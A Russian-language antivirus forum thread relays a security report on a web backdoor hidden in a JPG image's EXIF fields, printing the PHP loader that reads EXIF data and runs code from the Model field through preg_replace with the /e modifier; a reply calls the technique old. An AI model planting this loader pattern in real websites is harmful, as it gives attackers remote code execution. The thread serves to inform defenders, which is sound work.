|
|
Регистрация | Правила форума | FAQ форума | Справка | Пользователи | Поиск | Сообщения за день | Все разделы прочитаны |
Антивирусная защита, Malware (вредоносное ПО) Вирусы, руткиты, троянцы, программы-блокираторы - обмен опытом по избавлению компьютерного пространства от непрошеных гостей и подбору утилит, способных в этом помочь. |
|
Опции темы | Опции просмотра |
17.07.2013, 14:13 | #1 |
VIP-пользователь
|
Бэкдор - в служебном поле EXIF изображения JPG
Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может быть или новое изображение, которое пользователям разрешено добавлять на сайт, например, в качестве своего аватара или другой фотографии на форуме. Или это может быть измененная версия оригинального изображения.
На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для считывания служебных данных EXIF из файла JPG, а вторая функция запускает программу. $exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg'); preg_replace($exif['Make'],$exif['Model'],''); Как и следовало предполагать, вторую часть бэкдора нашли в файле bun.jpg. Оффтоппараметр /e используется для исполнения передаваемого ему кода. В то же время заголовок Model содержит непосредственно сам код. Если расшифровать текст, закодированный в base64, то мы увидим следующее. Оффтоп По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии. http://www.xakep.ru/post/60928/
__________________
Главное,чтобы работало,а веришь ты в это или нет - не важно. |
17.07.2013, 14:35 | #3 |
VIP-пользователь
|
я вообще не знаю почему только сейчас об этом написали,этой уязвимости уж как года 2 если не более.
__________________
Главное,чтобы работало,а веришь ты в это или нет - не важно. |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
Опции темы | |
Опции просмотра | |
|
|
Справочник словарей | ||
Словари русского языка - www.gramota.ru | Яndex - Словари | Википедия - ru.wikipedia.org |
|
|
|